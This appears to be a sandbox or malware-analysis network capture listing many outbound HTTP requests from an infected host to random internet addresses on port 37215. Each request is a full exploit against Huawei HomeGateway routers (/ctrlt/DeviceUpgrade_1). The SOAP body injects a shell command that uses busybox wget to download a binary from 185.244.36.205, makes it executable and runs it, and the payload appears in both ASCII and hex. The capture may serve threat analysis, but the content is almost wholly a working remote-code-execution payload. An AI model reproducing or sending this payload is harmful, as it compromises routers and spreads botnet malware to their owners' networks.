                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              313192.168.2.1558498190.30.106.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206971884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              314192.168.2.154394041.190.179.4837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.206971884 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              315192.168.2.154497089.147.159.16237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207011938 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              316192.168.2.1557760190.30.24.11037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207012892 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              317192.168.2.154816431.243.115.14737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207483053 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              318192.168.2.1557014121.30.179.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207505941 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              319192.168.2.154591831.127.188.18237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207695007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              320192.168.2.1539954107.121.138.15637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207741022 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              321192.168.2.156026031.86.162.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207742929 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              322192.168.2.1557324197.204.73.14937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207782030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              323192.168.2.1549470138.246.21.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:11.207782030 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
